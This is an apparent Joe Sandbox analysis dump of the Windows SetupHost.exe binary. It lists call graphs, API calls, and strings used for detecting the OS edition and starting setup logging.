GetNativeSystemInfo 37657->37658 37660 a0d25b 37657->37660 37661 a0d286 37658->37661 37659 9b9c14 11 API calls 37659->37660 37662 9b9d9c 6 API calls 37660->37662 37661->37659 37661->37660 37663 a0d2e0 37662->37663 37664 a0d2f0 37663->37664 37724 9b9b21 8 API calls 37663->37724 37666 a0f3a4 4 API calls 37664->37666 37667 a0d2fb 37666->37667 37667->37583 37668 a0d2fc 27 API calls __EH_prolog3_GS 37667->37668 37668->37579 37669->37581 37670->37585 37671->37558 37672->37562 37673->37564 37674->37567 37675->37568 37676->37572 37677->37574 37679 9bd0b5 11 API calls 37678->37679 37685 9bb1f4 37679->37685 37680 9bb206 RegQueryValueExW 37680->37685 37681 9bb251 37682 9b9d9c 6 API calls 37681->37682 37683 9bb297 37682->37683 37686 9bb2ab 37683->37686 37687 9bb29b GetProcessHeap HeapFree 37683->37687 37684 9bb258 37684->37681 37719 9a1c76 13 API calls 37684->37719 37685->37680 37685->37681 37685->37684 37690 9bb233 GetProcessHeap HeapAlloc 37685->37690 37688 9bb2ba 37686->37688 37689 9bb2b1 RegCloseKey 37686->37689 37687->37686 37688->37610 37688->37628 37689->37688 37690->37680 37692 9bb24a 37690->37692 37692->37681 37694 a0d46f __EH_prolog3_GS 37693->37694 37695 a0d494 memset RtlGetVersion 37694->37695 37704 a0d483 37694->37704 37696 9b9ca1 3 API calls 37695->37696 37701 a0d4cd 37696->37701 37697 a0d5a8 37698 9bb1d4 24 API calls 37697->37698 37698->37704 37699 9b9d9c 6 API calls 37702 a0d5de 37699->37702 37700 a0d587 37708 9b9c14 11 API calls 37700->37708 37701->37697 37701->37700 37703 a0d4f9 37701->37703 37701->37704 37705 a0d5f0 37702->37705 37720 9b9b21 8 API calls 37702->37720 37703->37700 37709 a0d50f GetModuleHandleW GetProcAddress 37703->37709 37704->37699 37707 a0f3a4 4 API calls 37705->37707 37710 a0d5fb 37707->37710 37708->37704 37711 a0d540 37709->37711 37712 a0d52c GetLastError 37709->37712 37710->37625 37710->37628 37711->37712 37714 a0d568 37711->37714 37713 a0d539 37712->37713 37713->37704 37714->37700 37715->37607 37716->37612 37717->37616 37718->37617 37719->37681 37720->37705 37721->37644 37722->37648 37723->37649 37724->37664 37726 9fd789 __EH_prolog3 37725->37726 37727 9fd7c5 LoadLibraryExW 37726->37727 37747 9fd7b4 37726->37747 37728 9fd7ec GetProcAddress 37727->37728 37729 9fd7db GetLastError 37727->37729 37730 9fd7fe GetLastError 37728->37730 37731 9fd812 GetProcAddress 37728->37731 37729->37747 37730->37747 37731->37730 37732 9fd825 GetProcAddress 37731->37732 37732->37730 37733 9fd838 GetProcAddress 37732->37733 37733->37730 37734 9fd84b GetProcAddress 37733->37734 37734->37730 37748 9fd85e 37734->37748 37735 9b9d9c 6 API calls 37736 9fd9c2 37735->37736 37737 9fd9c8 LocalFree 37736->37737 37738 9fd9d5 37736->37738 37737->37738 37739 9fd9db LocalFree 37738->37739 37740 9fd9e8 37738->37740 37739->37740 37741 9fd9ee LocalFree 37740->37741 37742 9fd9fb 37740->37742 37741->37742 37743 9fda0a 37742->37743 37744 9fda03 FreeLibrary 37742->37744 37743->37403 37744->37743 37745 9fd8bf LocalFree 37745->37748 37746 9fd92e LocalFree 37746->37748 37747->37735 37748->37745 37748->37746 37748->37747 37750 9bc700 37749->37750 37751 9b9d9c 6 API calls 37750->37751 37752 9bc721 37751->37752 37753 9bc728 RegCloseKey 37752->37753 37754 9bc731 37752->37754 37753->37754 37754->37413 37755->37409 38818 9a93e0 38819 9a93f2 38818->38819 38820 9a9427 38818->38820 38844 9b8eec 7 API calls 38819->38844 38821 9a9438 38820->38821 38838 9b8f1d GetFileAttributesW 38820->38838 38825 9a9465 38821->38825 38831 9a943e 38821->38831 38845 9b9b21 8 API calls 38821->38845 38823 9a93fd 38823->38820 38827 9a9403 38823->38827 38826 9a947c 38825->38826 38846 9b9273 20 API calls 38825->38846 38830 9a9497 38826->38830 38826->38831 38847 9b9b21 8 API calls 38826->38847 38827->38831 38833 9a94d5 38830->38833 38848 9b9273 20 API calls 38830->38848 38831->38833 38837 9b8ab5 183 API calls 38831->38837 38834 9b9d9c 6 API calls 38833->38834 38836 9a94dc 38834->38836 38837->38833 38839 9b8f2e 38838->38839 38840 9b9d9c 6 API calls 38839->38840 38841 9b8f41 38840->38841 38842 9b9d9c 6 API calls 38841->38842 38843 9b8f48 38842->38843 38843->38821 38844->38823 38845->38825 38846->38826 38847->38830 38848->38831 38849 9a2f00 GetProcessHeap HeapAlloc 38850 9a2f59 UuidCreate 38849->38850 38851 9a2f8d 38849->38851 38910 9bcd57 memset 38850->38910 38853 9a2fbe 38851->38853 38854 9a2fdd 38851->38854 38909 9a2f9b 38851->38909 38855 9b9c14 11 API calls 38853->38855 38914 9bb2c2 38854->38914 38858 9a2fc9 38855->38858 38857 9a2fe5 38859 9b9d9c 6 API calls 38857->38859 38863 9a30a4 38858->38863 38864 9a3045 38858->38864 38858->38909 38861 9a2ff9 38859->38861 38860 9b9d9c 6 API calls 38862 9a31e7 38860->38862 38861->38909 38925 9bb0b6 38861->38925 38865 9a31f2 38862->38865 39006 9b9b21 8 API calls 38862->39006 38866 9a30d9 memset 38863->38866 38867 9a30b4 memset 38863->38867 38868 9b9d9c 6 API calls 38864->38868 38872 9a320b 38865->38872 38873 9a31fc GetProcessHeap HeapFree 38865->38873 38934 9a23d2 38866->38934 38874 9a30cb 38867->38874 38875 9a304f 38868->38875 38878 9a3222 38872->38878 38879 9a3213 GetProcessHeap HeapFree 38872->38879 38873->38872 38999 9a258d 38874->38999 38998 9b9975 12 API calls 38875->38998 38881 9a322a GetProcessHeap HeapFree 38878->38881 38882 9a3239 38878->38882 38879->38878 38881->38882 38886 9a3250 38882->38886 38887 9a3241 GetProcessHeap HeapFree 38882->38887 38884 9a305d 38892 9a217c 20 API calls 38884->38892 38896 9a3072 38884->38896 38884->38909 38888 9a3263 38886->38888 38889 9a3254 GetProcessHeap HeapFree 38886->38889 38887->38886 38891 a0ea60 4 API calls 38888->38891 38889->38888 38890 9bb1d4 24 API calls 38890->38858 38894 9a3276 38891->38894 38892->38896 38898 9a308e GetProcessHeap HeapFree 38896->38898 38899 9a30a2 38896->38899 38896->38909 38898->38899 38899->38863 38900 9a3168 38902 9b9c14 11 API calls 38900->38902 38903 9a317a 38902->38903 38903->38909 38982 9b8b23 38903->38982 38906 9aee5d 2 API calls 38907 9a31b8 38906->38907 38908 9aee5d 2 API calls 38907->38908 38908->38909 38909->38860 38911 9bcdaf 38910->38911 38912 a0ea60 4 API calls 38911->38912 38913 9bcdc2 38912->38913 38913->38851 39007 9bd14e 38914->39007 38917 9bb2f2 38919 9b9d9c 6 API calls 38917->38919 38918 9bb315 RegSetKeySecurity 38918->38917 38920 9bb344 38919->38920 38921 9bb34a LocalFree 38920->38921 38922 9bb353 38920->38922 38921->38922 38923 9bb359 RegCloseKey 38922->38923 38924 9bb362 38922->38924 38923->38924 38924->38857 38926 9bd0b5 11 API calls 38925->38926 38927 9bb0da 38926->38927 38928 9bb0ec RegQueryValueExW 38927->38928 38929 9bb0e3 38927->38929 38928->38929 38930 9b9d9c 6 API calls 38929->38930 38931 9bb132 38930->38931 38932 9bb138 RegCloseKey 38931->38932 38933 9a3009 38931->38933 38932->38933 38933->38863 38933->38890 38933->38909 38935 9a23ee 38934->38935 38935->38935 38936 9a258d 2 API calls 38935->38936 38937 9a2414 38936->38937 38937->38909 38938 9a217c 38937->38938 39018 9a2639 strchr 38938->39018 38940 9a23cb 38965 9b986b 38940->38965 38942 9a229e 38942->38940 38943 9a22a9 strrchr 38942->38943 38943->38940 38945 9a22bc _set_errno strtol 38943->38945 38944 9a21d6 38946 9a21de 38944->38946 38947 9a220d 38944->38947 38948 9a22e0 38945->38948 38949 9a22f1 _errno 38945->38949 38946->38940 38951 a0ed1e 2 API calls 38946->38951 38950 a0ed1e 2 API calls 38947->38950 38948->38940 38948->38949 38949->38940 38952 9a2300 38949->38952 38953 9a221c 38950->38953 38959 9a21f6 38951->38959 38954 9a2338 38952->38954 38955 9a2309 38952->38955 38956 9a1ee1 6 API calls 38953->38956 38953->38959 39026 a0ed1e 38954->39026 38955->38940 38958 a0ed1e 2 API calls 38955->38958 38956->38959 38963 9a2321 38958->38963 38959->38940 38960 9a223f strncpy_s 38959->38960 38960->38940 38961 9a2347 38961->38963 39030 9a1ee1 UuidCreate 38961->39030 38963->38940 38964 9a2366 strncpy_s 38963->38964 38964->38940 38966 9b9892 38965->38966 38968 9b9881 38965->38968 38966->38968 39036 9bcf9e 6 API calls 38966->39036 38969 9b9d9c 6 API calls 38968->38969 38971 9b9958 38969->38971 38970 9b98a4 38970->38968 39037 9bcf9e 6 API calls 38970->39037 38973 9a3143 38971->38973 38974 9b995c GetProcessHeap HeapFree 38971->38974 38973->38900 38973->38909 39005 9b9b21 8 API calls 38973->39005 38974->38973 38975 9b98c4 38975->38968 39038 9bd03c 6 API calls 38975->39038 38977 9b98f5 38977->38968 38978 9b98fb GetProcessHeap HeapAlloc 38977->38978 38979 9b991a MultiByteToWideChar 38978->38979 38981 9b9913 38978->38981 38980 9b992e GetLastError 38979->38980 38979->38981 38980->38981 38981->38968 38983 9b8b3c 38982->38983 38984 9b8b42 38983->38984 39051 9bd3f7 6 API calls 38983->39051 38987 9b9d9c 6 API calls 38984->38987 38986 9b8b57 38986->38984 38988 9b9d9c 6 API calls 38986->38988 38990 9b8b77 38987->38990 38989 9b8b64 38988->38989 38991 9b9d9c 6 API calls 38989->38991 38992 9b9d9c 6 API calls 38990->38992 38991->38984 38993 9b8b89 38992->38993 38994 9b8b97 38993->38994 39039 9bb149 38993->39039 38996 9b9d9c 6 API calls 38994->38996 38997 9a318b 38996->38997 38997->38906 38997->38909 38998->38884 39000 9a25a8 38999->39000 39001 9a25bc memcpy_s 39000->39001 39003 9a25e2 39000->39003 39002 9a25d7 39001->39002 39001->39003 39002->39003 39004 9a2619 sprintf_s 39002->39004 39003->38866 39004->39003 39005->38900 39006->38865 39008 9bd189 GetCurrentProcess IsWow64Process 39007->39008 39009 9bd179 39007->39009 39010 9bd19e GetLastError 39008->39010 39011 9bd1b6 RegCreateKeyExW 39008->39011 39009->39008 39013 9bd1ab 39010->39013 39011->39013 39014 9b9d9c 6 API calls 39013->39014 39015 9bd207 39014->39015 39016 9bd20d RegCloseKey 39015->39016 39017 9bb2e9 39015->39017 39016->39017 39017->38917 39017->38918 39022 9a2669 39018->39022 39019 9a267b 39020 a0ea60 4 API calls 39019->39020 39021 9a2190 39020->39021 39021->38940 39021->38942 39021->38944 39022->39019 39023 9a26ee strchr 39022->39023 39024 9a2723 strncpy_s _set_errno strtol 39022->39024 39025 9a275f _errno 39022->39025 39023->39022 39024->39022 39024->39025 39025->39019 39025->39022 39027 a0ed2a __EH_prolog3_catch 39026->39027 39035 9a1a30 GetProcessHeap HeapAlloc 39027->39035 39029 a0ed36 39029->38961 39031 9bcd57 5 API calls 39030->39031 39032 9a1f25 39031->39032 39033 a0ea60 4 API calls 39032->39033 39034 9a1f34 39033->39034 39034->38963 39035->39029 39036->38970 39037->38975 39038->38977 39040 9bd0b5 11 API calls 39039->39040 39042 9bb170 39040->39042 39041 9bb1a1 39045 9b9d9c 6 API calls 39041->39045 39042->39041 39043 9b9d9c 6 API calls 39042->39043 39044 9bb17d RegSetValueExW 39043->39044 39044->39041 39046 9bb1b6 39045->39046 39047 9aee5d 2 API calls 39046->39047 39048 9bb1be 39047->39048 39049 9bb1cc 39048->39049 39050 9bb1c3 RegCloseKey 39048->39050 39049->38994 39050->39049 39051->38986 36191 a06340 36194 a062c0 36191->36194 36196 a062e6 36194->36196 36195 a0632a 36196->36195 36197 a06315 36196->36197 36200 a05479 36196->36200 36197->36195 36198 a05479 6 API calls 36197->36198 36198->36195 36201 a0540d 5 API calls 36200->36201 36202 a0548a 36201->36202 36203 a054aa 36202->36203 36205 a02370 WriteFile 36202->36205 36203->36197 36205->36203

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 9fde32-9fdf12 call a0f3e6 memset * 2 call 9fe4a7 memset * 3 RtlGetVersion call 9b9ca1 7 9fdf26-9fdf48 call 9fdc8e call 9fdcf8 0->7 8 9fdf14 0->8 18 9fdf4e-9fdf7c RegOpenKeyExW call 9b9d53 7->18 19 9fe208-9fe20f call 9fddca 7->19 9 9fdf1a-9fdf21 call 9b9d84 8->9 15 9fe432-9fe476 call 9b9d9c call 9aee5d * 5 9->15 91 9fe47f-9fe48d 15->91 92 9fe478-9fe479 FreeLibrary 15->92 18->8 27 9fdf7e-9fdfb1 RegQueryValueExW 18->27 28 9fe23e-9fe26c RegOpenKeyExW 19->28 29 9fe211-9fe218 19->29 34 9fdfd3-9fe00f RegQueryValueExW 27->34 35 9fdfb3-9fdfba 27->35 31 9fe26e-9fe274 RegCloseKey 28->31 32 9fe27a-9fe27c 28->32 29->28 30 9fe21a-9fe22b 29->30 38 9fe22d-9fe232 30->38 39 9fe234 30->39 31->32 40 9fe27e-9fe28b 32->40 41 9fe28d-9fe299 32->41 36 9fe0a9-9fe0af 34->36 37 9fe015-9fe051 RegQueryValueExW 34->37 35->34 43 9fdfbc-9fdfce call 9a17c0 35->43 47 9fe0c3-9fe0c5 36->47 48 9fe0b1-9fe0bd RegCloseKey 36->48 37->36 44 9fe053-9fe05a 37->44 45 9fe239 call 9a17c0 38->45 39->45 46 9fe29a-9fe2a3 40->46 41->46 43->34 51 9fe05c-9fe066 44->51 52 9fe0a0-9fe0a3 44->52 45->28 54 9fe2a5-9fe2af 46->54 55 9fe2b1-9fe2b4 46->55 56 9fe0c7-9fe0ce 47->56 57 9fe0e6-9fe0ea 47->57 48->47 51->52 61 9fe068-9fe072 51->61 52->36 62 9fe2e2-9fe2f0 54->62 63 9fe2b6-9fe2c0 55->63 64 9fe2c2-9fe2c5 55->64 56->57 65 9fe0d0-9fe0e4 call 9a17c0 56->65 59 9fe0ec-9fe0ee 57->59 60 9fe15b-9fe16a LoadLibraryW 57->60 67 9fe0f4-9fe0f6 59->67 68 9fe0f0-9fe0f2 59->68 72 9fe16c-9fe17c GetProcAddress 60->72 73 9fe1b0-9fe203 GetLastError call 9a1d02 call a0086c GetLastError call 9b9d6c 60->73 61->52 71 9fe074-9fe07b 61->71 69 9fe2fc-9fe32a call a0df14 62->69 70 9fe2f2 62->70 63->62 76 9fe2c7-9fe2d1 64->76 77 9fe2d3-9fe2d6 64->77 65->60 79 9fe0f7-9fe155 SetLastError GetLastError call 9a1d02 call a0086c call 9b9d53 67->79 68->79 94 9fe37e-9fe3be GetLastError call 9a1d02 call a0086c 69->94 95 9fe32c-9fe354 CompareStringW 69->95 70->69 71->52 81 9fe07d-9fe09e call 9a17c0 71->81 72->73 83 9fe17e-9fe18b 72->83 73->9 76->62 77->62 78 9fe2d8 77->78 78->62 79->8 79->60 81->36 106 9fe18d-9fe191 83->106 99 9fe48f-9fe495 RegCloseKey 91->99 100 9fe49b-9fe4a6 call a0f3a4 91->100 92->91 109 9fe3c3-9fe427 GetLastError call 9a1d02 call a0086c 94->109 102 9fe35b-9fe377 CompareStringW 95->102 103 9fe356-9fe359 95->103 99->100 102->109 110 9fe379-9fe37c 102->110 103->109 106->73 114 9fe193-9fe1ab call 9a17c0 GlobalFree 106->114 124 9fe42c 109->124 110->109 114->28 124->15
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 009FDE3C
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FDE59
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FDE6A
                                                                                                                                                                                                                  • Part of subcall function 009FE4A7: memset.MSVCRT ref: 009FE4D9
                                                                                                                                                                                                                  • Part of subcall function 009FE4A7: RtlGetVersion.NTDLL ref: 009FE4EE
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FDEBA
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FDECF
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FDEE4
                                                                                                                                                                                                                • RtlGetVersion.NTDLL ref: 009FDEFD
                                                                                                                                                                                                                  • Part of subcall function 009B9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,009A7B5C), ref: 009B9CD7
                                                                                                                                                                                                                  • Part of subcall function 009B9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,009A7B5C), ref: 009B9CE1
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 009FDF67
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32 ref: 009FDFA9
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32 ref: 009FDFFE
                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 009FE041
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(?), ref: 009FE0B7
                                                                                                                                                                                                                  • Part of subcall function 009B9D9C: EtwEventEnabled.NTDLL(?,?,009BBC0D), ref: 009B9E13
                                                                                                                                                                                                                  • Part of subcall function 009B9D9C: EtwEventWrite.NTDLL(?,?,009BBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 009B9E3B
                                                                                                                                                                                                                  • Part of subcall function 009AEE5D: GetProcessHeap.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,009BB3D8,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 009AEE6B
                                                                                                                                                                                                                  • Part of subcall function 009AEE5D: HeapFree.KERNEL32(00000000), ref: 009AEE72
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,000004E1,base\ntsetup\conx\common\setuplib\src\osinfo.cpp,ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo,00000002,00000000), ref: 009FE479
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009FE495
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$QueryValue$CloseEventFreeHeapVersion$EnabledErrorH_prolog3_HandleLastLibraryModuleOpenProcessWrite
                                                                                                                                                                                                                • String ID: %WINDOWS_LONG%$%hs: couldn't get host edition id$%hs: couldn't get host product name$BrandingFormatString$Client Workstation$Complete$ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo$ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo$Core$DigitalProductId4$EditionId$Failed to determine source edition type! Error: [0x%X]$HomeEdition$InstallationType$Professional$SOFTWARE\Microsoft\Sysprep$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Server Workstation$Source OS: Host SKU Info: Edition = '%s', Edition Type = '%s', Installation Type = '%s', Product Name = '%s', Arch = %s, StationType = %s, Stage type = %s$Staged Image$Unstaged Image$amd64$arm$arm64$base\ntsetup\conx\common\setuplib\src\osinfo.cpp$unknown$winbrand.dll$x86
                                                                                                                                                                                                                • API String ID: 579081697-1122241035
                                                                                                                                                                                                                • Opcode ID: 6ae75119dea24564c8fbacce8222f47f3b6709ce2eb71f56e2fb06ef27aa1e3d
                                                                                                                                                                                                                • Instruction ID: 95d1af5184331dbdd07ab68b2c402fd4c14b398729ba19d0b9ec75e9e67e49b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ae75119dea24564c8fbacce8222f47f3b6709ce2eb71f56e2fb06ef27aa1e3d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AF1C171A00318ABDF209F54CC49FEE77B9AF96710F1441A9F609A61A0DBB48E81CF52
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 125 9ff60e-9ff730 call a101e0 memset * 8 call a0290c 130 9ff736-9ff73d call 9fed7d 125->130 131 9ffbf5 125->131 136 9ff73f-9ff744 130->136 137 9ff74e-9ff76b call a027a0 130->137 132 9ffbf7-9ffc10 call a0ea60 131->132 136->137 141 9ff76d-9ff776 GetLastError 137->141 142 9ff7a9-9ff7b0 137->142 143 9ff778-9ff79b 141->143 144 9ff7a1-9ff7a3 141->144 145 9ff7b8-9ff7cd 142->145 146 9ff7b2 142->146 143->144 144->131 144->142 147 9ffb9e-9ffbaa call a01dd1 call a045c1 145->147 148 9ff7d3 145->148 146->145 162 9ffbaf-9ffbb9 147->162 149 9ff7d9-9ff7e8 148->149 152 9ff7ea-9ff806 call 9fecc6 149->152 153 9ff808-9ff81c GetWindowsDirectoryA 149->153 152->153 157 9ff833-9ffa48 call 9be595 152->157 156 9ff81e-9ff82e call 9fec25 153->156 153->157 156->157 168 9ffa4e-9ffa75 call 9be595 157->168 169 a000a4-a000b1 call a000cc 157->169 162->149 164 9ffbbf-9ffbc5 162->164 166 9ffbcd-9ffbf3 164->166 167 9ffbc7 164->167 166->131 167->166 168->169 175 9ffa7b-9ffaa2 call 9be595 168->175 174 a000b6-a000bb 169->174 174->132 175->169 180 9ffaa8-9ffacf call 9be595 175->180 180->169 183 9ffad5-9ffafc call 9be595 180->183 183->169 186 9ffb02-9ffb29 call 9be595 183->186 186->169 189 9ffb2f-9ffb56 call 9be595 186->189 189->169 192 9ffb5c-9ffb62 189->192 193 9ffc7a-9ffc87 192->193 194 9ffb68-9ffb79 192->194 195 9ffc89-9ffc8f 193->195 196 9ffca7-9ffcae call 9ff5a0 193->196 197 9ffb7f-9ffb96 call 9be595 194->197 198 9ffc13 194->198 195->196 200 9ffc91-9ffca1 SetUnhandledExceptionFilter 195->200 196->169 208 9ffcb4-9ffcc0 196->208 197->193 207 9ffb9c 197->207 202 9ffc18-9ffc27 ExpandEnvironmentStringsW 198->202 200->196 205 9ffc29-9ffc32 GetFileAttributesW 202->205 206 9ffc46-9ffc50 GetTempPathW 202->206 205->206 209 9ffc34-9ffc44 call 9a1840 205->209 206->193 210 9ffc52-9ffc72 wcsrchr 206->210 207->202 211 9ffcc2-9ffcc4 208->211 212 9ffd10-9ffd17 208->212 209->193 209->206 210->193 227 9ffc74-9ffc76 210->227 211->212 216 9ffcc6-9ffcf7 211->216 214 9ffd19-9ffd1b 212->214 215 9ffd67-9ffd6e 212->215 214->215 219 9ffd1d-9ffd4e 214->219 220 9ffdb5-9ffdce 215->220 221 9ffd70-9ffd72 215->221 236 9ffcf9-9ffcfb 216->236 240 9ffd50-9ffd52 219->240 223 9ffe1e-9ffe27 220->223 224 9ffdd0-9ffdd2 220->224 221->220 225 9ffd74-9ffda0 221->225 230 9ffe6a-9ffe6e 223->230 231 9ffe29-9ffe2b 223->231 224->223 228 9ffdd4-9ffe09 224->228 225->169 249 9ffda6-9ffdb0 225->249 227->193 228->169 257 9ffe0f-9ffe19 228->257 232 9ffef4-9ffefb 230->232 233 9ffe74-9ffe76 230->233 231->230 234 9ffe2d-9ffe53 231->234 241 9ffefd-9ffeff 232->241 242 9fff77-9fff7f 232->242 233->232 238 9ffe78-9ffea4 233->238 234->169 260 9ffe59-9ffe68 234->260 236->169 237 9ffd01-9ffd0b 236->237 237->212 238->169 270 9ffeaa-9ffedf 238->270 240->169 244 9ffd58-9ffd62 240->244 241->242 243 9fff01-9fff31 241->243 245 9fff81-9fffca GetCurrentProcessId 242->245 246 9fffd0-9fffdc 242->246 243->169 272 9fff37-9fff63 243->272 244->215 245->246 251 9fffde-9ffffc 246->251 252 a00044-a0004b 246->252 249->220 251->252 277 9ffffe-a00032 GetLastError call 9a1d02 251->277 254 a0007d-a00083 252->254 255 a0004d-a00053 252->255 262 a00085-a0008a 254->262 263 a0008c-a00092 254->263 255->254 261 a00055-a00073 RtlAddVectoredExceptionHandler 255->261 257->223 260->230 261->254 268 a00099-a000a2 262->268 263->169 269 a00094-a00096 263->269 268->169 269->268 270->169 284 9ffee5-9ffeef 270->284 283 9fff65-9fff67 272->283 282 a00037-a0003f call a0086c 277->282 282->252 283->169 286 9fff6d 283->286 284->232 286->242
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF693
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF6A7
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF6B6
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF6C5
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF6D4
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF6E3
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF6F5
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF704
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: GetVersion.KERNEL32 ref: 00A0294F
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: GetModuleHandleW.KERNEL32(kernel32), ref: 00A029C3
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 00A029D3
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: memset.MSVCRT ref: 00A02A87
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00A02AA0
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00A02AB3
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: FreeLibrary.KERNEL32(00000000), ref: 00A02AC8
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009FF76D
                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,000000FA), ref: 009FF814
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(%WINDIR%\Minidump,C:\$Windows.~WS\Sources\Panther\,00000104), ref: 009FFC1F
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(C:\$Windows.~WS\Sources\Panther\), ref: 009FFC2A
                                                                                                                                                                                                                • GetTempPathW.KERNEL32 ref: 009FFC48
                                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 009FFC68
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(009FF3E0), ref: 009FFC96
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 009FFF81
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 00A0000B
                                                                                                                                                                                                                • RtlAddVectoredExceptionHandler.NTDLL ref: 00A00071
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$EnvironmentErrorExceptionExpandLastLibraryStrings$AddressAttributesCurrentDirectoryFileFilterFreeHandleHandlerLoadModulePathProcProcessTempUnhandledVectoredVersionWindows_vsnwprintfwcsrchr
                                                                                                                                                                                                                • String ID: %S\%s$%WINDIR%\Minidump$%s\$C:\$Windows.~WS\Sources\Panther\$C:\$Windows.~WS\Sources\SetupHost.Exe$C:\$Windows.~WS\Sources\SetupHost.Exe$CONOUT$$Con$Err$Fil$Fun$Global\SetupLog$Global\WdsSetupLogInit$Msg$SACSetupAct$SACSetupErr$SetupLog$Sev$Uid$Unable to load global log filter.$WdsSetupLogInit$Windows Setup activity log$Windows Setup error log$c:\$debug.log$diagerr.xml$diagwrn.xml$onecore\base\ntsetup\panther\wdslog\setuplog.cpp$setupact.log$setuperr.log$setuplog.cfg$setuplog.xml
                                                                                                                                                                                                                • API String ID: 2056404476-116375851
                                                                                                                                                                                                                • Opcode ID: aa25ef9e9c33d12d71f4618b0bac2474c8454c32a78758f681b9fc02187be03e
                                                                                                                                                                                                                • Instruction ID: be22260fe4a4dc97ee5d64be3d7b2dc16bba3db8ce3b3640b71595f1f5f816ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa25ef9e9c33d12d71f4618b0bac2474c8454c32a78758f681b9fc02187be03e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD523FB1A002199FDB30DF59DC45BEAB7B8EF48744F0041B9AA49E7290E7B19E81CF50
